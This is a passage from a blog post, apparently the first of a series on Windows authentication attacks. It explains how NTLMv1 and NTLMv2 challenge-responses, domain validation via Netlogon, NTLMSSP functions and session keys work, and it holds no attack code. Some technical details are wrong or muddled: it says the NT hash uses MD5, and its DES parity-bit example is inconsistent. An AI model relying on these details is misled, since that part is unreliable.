user’s password, which makes the NTLMv2 hash. A blob block is then constructed containing – Timestamp – Client nonce (8 bytes) – Target information block from type 2 message This blob block is concatenated with the challenge from type 2 message and then encrypted using the NTLMv2 hash as a key via HMAC-MD5 algorithm. Lastly, this output is concatenated with the previously constructed blob to form the NTLMv2-SSP challenge-response (type 3 message) so basically the NTLMv2_response = HMAC-MD5(text(challenge + blob), using NTLMv2 as a key) and the challenge response is NTLMv2_response + blob. Out of curiosity and just to know the difference between the ntlmv1 and v2, How is NTLMv1 response calculated?! 1 – The NTLM hash of the plaintext password is calculated as pre-mentioned, using the MD5 algorithm, so assuming that the password is P@ssw0rd, the NTLM hash will be E19CCF75EE54E06B06A5907AF13CEF42 2 – These 16 bytes are then padded to 21 bytes, so it becomes E19CCF75EE54E06B06A5907AF13CEF420000000000 3 – This value is split into three 7 bytes thirds 0xE19CCF75EE54E0 0x6B06A5907AF13C 0xEF420000000000 4 – These 3 values are used to create three 64 bits DES keys by adding parity bits after every 7 bits as usual So for the 1st key 0xE19CCF75EE54E0 11100001 10011100 11001111 01110101 11101110 01010100 11100000 8 parity bits will be added so it becomes 111000001 100111000 110010111 011100101 111001110 010010100 1011000000 In Hex : 0xE0CE32EE5E7252C0 Same goes with the other 2 keys 5 – Each of the three keys is then used to encrypt the challenge obtained from Message type 2. 6 – The 3 results are combined to form the 24-byte NTLM response. So in NTLMv1, there is no client nonce or timestamp being sent to the server, keep that in mind for later. 6 – Session Setup Response The server receives type 3 message which contains the challenge-response The server has its own copy of the user’s NTLM hash, challenge, and all the other information needed to calculate its own challenge-response message. The server then compares the output it has generated with the output it got from the client. Needless to say, if the NT-Hash used to encrypt the data on the client-side, it differs from the user’s password’s NT-hash stored on the server (The user entered the wrong password), the challenge-response won’t be the same as the server’s output. And thus user get ACCESS_DENIED or LOGON_FAILURE message Unlike if the user entered the correct password, the NT-Hash will be the same, and the encryption (challenge-response) result will be the same on both sides and then the login will succeed. That’s how the full authentication process happened without directly sending or receiving the NTLM hash or the plaintext password over the network. NTLM authentication in a windows domain environment The process is the same as mentioned before except for the fact that domain users credentials are stored on the domain controllers So the challenge-response validation [Type 3 message] will lead to establishing a Netlogon secure channel with the domain controller where the passwords are saved. The server will send the domain name, username, challenge, and the challenge-response to the domain controller which will determine if the user has the correct password or not based on the hash saved at the NTDS file (unlike the previous scenario in which the hash was stored locally on the SAM). So from the server-side, you will find the following 2 extra RPC_NETLOGON messages to and from the Domain controller. and if everything is ok it will just send the session key back to the server in the RPC_NETLOGON response message. NTLMSSP To fully understand that mechanism you can’t go without knowing a few things about NTLMSSP, Will discuss this in brief and dig deeper into it during the attacks part. From Wikipedia NTLMSSP (NT LAN Manager (NTLM) Security Support Provider) is a binary messaging protocol used by the Microsoft Security Support Provider Interface (SSPI) to facilitate NTLM challenge-response authentication and to negotiate integrity and confidentiality options. NTLMSSP is used wherever SSPI authentication is used including Server Message Block / CIFS extended security authentication, HTTP Negotiate authentication (e.g. IIS with IWA turned on) and MSRPC services. The NTLMSSP and NTLM challenge-response protocol have been documented in Microsoft’s Open Protocol Specification. SSP is a framework provided by Microsoft to handle that whole NTLM authentication and integrity process, Let’s repeat the previous authentication process in terms of NTLMSSPI 1 – The client gets access to the user’s credentials set via AcquireCredentialsHandle function 2 – The Type 1 message is created by calling InitializeSecurityContext function in order to start the authentication negotiation process which will obtain an authentication token and then the message is forwarded to the server, that message contains the NTLMSSP 8 bytes signature mentioned before. 3 – The server receives the “Type 1 message“, extracts the token and passes it to the AcceptSecurityContext function which will create a local security context representing the client and generate the NTLM challenge and send it back to the client (Type 2 message). 4 – The client extracts the challenge, passes it to InitializeSecurityContext function which creates the Challenge-response (Type 3 message) 5 – The server passes the Type 3 message to the AcceptSecurityContext function which validates if the user authenticated or not as mentioned earlier. These function/process has nothing to do with the SMB protocol itself, they are related to the NTLMSSP, so they’re called whenever you’re triggering authenticating using NTLMSSP no matter the service you’re calling. How does NTLMSSP assure integrity? To assure integrity, SSP applies a Message Authentication Code to the message. This can only be verified by the recipient and prevent the manipulation of the message on the fly (in a MITM attack for example) The signature is generated using a secret key by the means of symmetric encryption, and that MAC can only be verified by a party possessing the key (The client and the server). That key generation varies from NTLMv1 to NTLMv2 At NTLMv1 the secret key is generated using MD4(NTHash) At NTLMv2 1 – The NTLMv2 hash is obtained as mentioned earlier 2 – The NTLMv2 blob is obtained as also mentioned earlier 3 – The server challenge is concatenated with the blob and encrypted with HMAC-MD5 using NTLMv2 hash as a key 4 – That output is encrypted again with HMAC-MD5 using again NTLMv2 hash as a key HMAC-MD5(NTLMv2, OUTPUT_FROM_STEP_3) And that’s the session key You’ll notice that to generate that key it requires to know the NThash in both cases, either in NTLMv1 or NTLMv2, the only sides owning that key are the client and the server. The MITM doesn’t own it and so can’t manipulate the message. This isn’t always the case for sure, and it has it’s own pre-requirements and so it’s own drops which will be discussed in the next parts where we’re going to dig deeper inside the internals of the authentication/integrity process in order to gain more knowledge on how these features are abused. Conclusion and references We’ve discussed the difference between LM, NTHash, NTLMv1 and NTLMv2 hashes. I went through the NTLM authentication process and made a quick brief about the NTLMSSP’s main functions. In the next parts, we will dig deeper into how NTLMSSP works and how can we abuse the NTLM authentication mechanism. If you believe there is any mistake or update that needs to be added, feel free to contact me at Twitter. References The NTLM Authentication Protocol and Security Support Provider Mechanics of User Identification and Authentication: Fundamentals of Identity Management [MS-NLMP]: NT LAN Manager (NTLM) Authentication Protocol LM, NTLM, Net-NTLMv2, oh my! Sursa: https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/